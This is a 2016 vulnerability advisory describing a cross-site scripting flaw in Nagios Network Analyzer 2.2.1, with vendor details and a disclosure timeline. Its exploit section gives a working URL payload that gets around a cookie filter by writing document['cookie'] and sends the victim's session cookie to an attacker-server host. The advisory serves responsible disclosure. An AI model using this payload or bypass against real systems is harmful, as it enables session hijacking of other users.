Nagios Network Analyzer 2.2.1 Cross Site Scripting

`[+] Credits: John Page - HYP3RLINX  
  
[+] Website: hyp3rlinx.altervista.org  
  
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-XSS.txt  
  
[+] ISR: ApparitionSec  
  
  
  
Vendor:  
===============  
www.nagios.com  
  
  
  
Product:  
==============================  
Nagios Network Analyzer v2.2.1  
  
Netflow Analysis, Monitoring, and Bandwidth Utilization Software  
  
Network Analyzer provides an in-depth look at all network traffic sources  
and potential security threats allowing system  
admins to quickly gather high-level information regarding the health of the  
network as well as highly granular data for  
complete and thorough network analysis.  
  
  
  
  
Vulnerability Type:  
==========================  
Cross Site Scripting (XSS)  
  
  
  
CVE Reference:  
==============  
N/A  
  
  
  
Vulnerability Details:  
=====================  
  
Nagios NA has XSS vector which enables attackers to inject client-side  
scripts into web pages viewed by other users. A cross-site scripting  
vulnerability may be  
used by attackers to bypass access controls such as the same-origin policy.  
The application seems to filter injecting "document.cookie", however we can  
bypass  
this by using document['cookie'] in its place.  
  
  
  
  
Exploit code(s):  
===============  
  
  
Steal Session Cookie  
  
http://victim-server/nagiosna/index.php/sources/queries/1?q[begindate]=-24+hours&q[enddate]=-1+second&q[aggregate_csv]=&q[qid]=%27%27;window.open(%22http://attacker-server/c.php?c=%22%2bdocument[%27cookie%27])//  
  
  
  
  
Disclosure Timeline:  
======================================  
Vendor Notification: July 20, 2016  
Vendor Acknowledgement: July 21, 2016  
Vendor Fix / Release: August 1, 2016  
August 8, 2016 : Public Disclosure  
  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
  
Severity Level:  
================  
Low  
  
  
  
[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the  
information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author  
prohibits any malicious use of security related information  
or exploits by the author or elsewhere.  
  
HYP3RLINX  
`